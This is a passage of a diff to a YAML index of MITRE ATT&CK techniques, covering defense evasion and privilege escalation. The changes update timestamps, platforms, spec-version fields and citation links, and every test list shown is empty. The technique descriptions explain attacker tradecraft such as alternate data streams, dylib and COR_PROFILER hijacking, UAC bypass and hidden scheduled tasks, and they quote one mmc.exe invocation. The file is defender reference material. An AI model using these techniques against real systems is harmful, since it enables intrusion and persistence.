         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14383,11 +14666,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14454,8 +14736,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14473,7 +14755,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14576,12 +14857,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14594,6 +14874,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14630,17 +14911,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14686,9 +14967,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14726,7 +15004,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14745,7 +15023,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14776,7 +15053,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14800,12 +15077,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14889,7 +15164,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14911,7 +15185,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14945,12 +15219,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -15002,9 +15274,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -15073,7 +15344,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -15120,7 +15390,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -15133,12 +15403,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -15217,7 +15488,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15239,7 +15510,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -15282,7 +15552,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15306,8 +15576,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15355,7 +15623,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15393,8 +15661,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15443,7 +15709,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15495,29 +15761,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15564,7 +15829,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15596,8 +15861,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15611,6 +15876,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15623,11 +15892,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15693,7 +15965,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15782,7 +16053,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15870,7 +16140,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15955,7 +16224,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15987,7 +16255,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -16010,11 +16278,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -16072,14 +16339,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -16180,7 +16446,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -16211,7 +16476,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16245,13 +16510,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -16270,7 +16533,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -16284,7 +16546,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -16311,8 +16572,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16343,12 +16604,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16420,9 +16682,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16438,12 +16700,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16518,12 +16779,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16543,9 +16803,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16565,9 +16830,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16584,6 +16848,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16617,7 +16885,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
